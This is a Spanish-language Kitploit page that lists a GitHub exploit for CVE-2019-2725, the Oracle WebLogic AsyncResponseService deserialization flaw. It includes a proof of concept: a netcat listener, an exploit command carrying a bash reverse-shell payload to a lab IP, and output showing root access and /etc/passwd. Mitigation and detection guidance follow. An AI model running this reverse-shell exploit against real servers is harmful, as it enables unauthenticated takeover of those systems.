Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725 — Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: Web Services). Las versiones compatibles afectadas son 10.3.6.0.0 y 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite que un atacante no autenticado con acceso a la red a través de HTTP comprometa Oracle WebLogic Server. | Kitploit
Herramientas/GitHubGitHub/loursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingHerramienta de Acceso Remoto
GitHubloursha/oracle-weblogic-server-asyncresponseservice-deserialization-remote-code-execution-cve-2019-2725

Oracle-Weblogic-Server-AsyncResponseService-Deserialization-Remote-Code-Execution-CVE-2019-2725

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
hace 7 mesesAún no revisado

Acerca de

Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: Web Services). Las versiones compatibles afectadas son 10.3.6.0.0 y 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite que un atacante no autenticado con acceso a la red a través de HTTP comprometa Oracle WebLogic Server.

Compartir

CVE-2019-2725 – Ejecución Remota de Código No Autenticada en Oracle WebLogic

Vulnerabilidad en el componente Oracle WebLogic Server de Oracle Fusion Middleware (subcomponente: Web Services). Las versiones compatibles afectadas son 10.3.6.0.0 y 12.1.3.0.0. Una vulnerabilidad fácilmente explotable permite a un atacante no autenticado con acceso a la red a través de HTTP comprometer el Oracle WebLogic Server.

Resumen de la Vulnerabilidad

ID de CVE: CVE-2019-2725
Severidad: Crítica (CVSS v3: 9.8)
Tipo de Vulnerabilidad: Ejecución Remota de Código No Autenticada (RCE)
Producto Afectado: Oracle WebLogic Server
Componente Afectado: AsyncResponseService
Autenticación Requerida: No
Interacción del Usuario Requerida: No

CVE-2019-2725 es una vulnerabilidad crítica de deserialización en Oracle WebLogic Server que permite a atacantes remotos no autenticados ejecutar comandos arbitrarios del sistema mediante una solicitud SOAP especialmente diseñada enviada al endpoint /_async/AsyncResponseService.


Versiones Afectadas

Versiones de Oracle WebLogic Server anteriores al Critical Patch Update de abril de 2019, incluyendo, entre otras:

  • WebLogic 10.3.6
  • WebLogic 12.1.3
  • WebLogic 12.2.1.3

Descripción de la Vulnerabilidad

La vulnerabilidad existe debido a una deserialización insegura en el AsyncResponseService.
Un atacante puede enviar una carga útil XML maliciosa que da como resultado la ejecución de comandos arbitrarios en el sistema operativo subyacente sin autenticación.

Este problema es particularmente peligroso porque:

  • El endpoint suele estar expuesto externamente
  • No se requieren credenciales válidas
  • La explotación conduce directamente al compromiso total del sistema

Escenario de Ataque

  1. El atacante identifica una instancia de WebLogic expuesta
  2. El atacante envía una solicitud SOAP maliciosa a:
  3. WebLogic deserializa los datos controlados por el atacante
  4. Se ejecutan comandos arbitrarios del sistema operativo
  5. El atacante obtiene acceso a un shell remoto

Prueba de Concepto (PoC)

🔹 Listener del Atacante (Segunda CLI)

Inicie un listener de Netcat para recibir la reverse shell:

root@kitploit:~
nc -lvp 2323

🔹 Ejecución del Exploit (Primera CLI)

Ejecute el script del exploit contra el servidor WebLogic vulnerable:

root@kitploit:~
python3 CVE-2019-2725.py http://172.17.0.6:7001/_async/AsyncResponseService '/bin/bash -i >& /dev/tcp/172.17.0.10/2323 0>&1'

Salida esperada:

root@kitploit:~
[+] Target appears VULNERABLE
[*] Sending payload...
[+] Payload delivered successfully (HTTP 202)

🔹 Resultado de la Explotación Exitosa

En el listener de Netcat, se recibe una reverse shell:

root@kitploit:~
Listening on 0.0.0.0 2323
Connection received on 172.17.0.6 39926
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# whoami
root
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# pwd
/root/Oracle/Middleware/user_projects/domains/base_domain
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain# cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
root@8c9cc07feb3e:~/Oracle/Middleware/user_projects/domains/base_domain#

Mitigación y Remediación

Acciones Recomendadas

  1. Aplique el Critical Patch Update (CPU) de Oracle de abril de 2019
  • Actualice Oracle WebLogic Server a una versión que incluya las correcciones de seguridad de abril de 2019 proporcionadas por Oracle https://www.oracle.com/security-alerts/alert-cve-2019-2725.html
  1. Restrinja el Acceso al Endpoint Vulnerable
  • Esto confirma la ejecución remota de comandos y el acceso a nivel de sistema.
  • Asegúrese de que este endpoint no esté expuesto a redes no confiables
  • Restrinja el acceso únicamente a rangos de IP internos o confiables
  1. Bloquee el Acceso No Confiable Mediante Controles de Red
  • Implemente reglas de firewall estrictas
  • Aplique el control de acceso a través de proxies inversos
  • Deshabilite el acceso externo innecesario a los servicios de administración y asíncronos de WebLogic
  1. Habilite el Registro y la Monitorización Continua
  • Supervise los registros de acceso HTTP
  • Alerte sobre patrones de solicitud anormales dirigidos a endpoints asíncronos

Indicadores de Detección

Los siguientes indicadores pueden sugerir un intento de explotación o una explotación exitosa:

🔍 Indicadores de Red y Aplicación

  • Solicitudes a:
  • Cargas útiles SOAP/XML sospechosas o malformadas
  • Respuestas repetidas HTTP 202 Accepted de servicios asíncronos

🔍 Indicadores Basados en el Host

  • Conexiones de red salientes iniciadas por WebLogic Server
  • Ejecución inesperada de shells como:
  • /bin/bash
  • /bin/sh
  • Creación de conexiones reverse shell hacia IPs o puertos desconocidos

Recomendaciones de Monitorización de Seguridad

  • Habilite firmas IDS/IPS para patrones conocidos de explotación SOAP de WebLogic
  • Supervise el tráfico saliente de los servidores WebLogic
  • Implemente la ejecución con privilegios mínimos para los servicios de aplicación
  • Revise periódicamente los registros de ejecución de procesos de WebLogic

Créditos

Se hizo referencia a los siguientes repositorios públicos para la comprensión y validación del exploit:

  • https://github.com/lufeirider/CVE-2019-2725
  • https://github.com/pimps/CVE-2019-2725

Descargar herramienta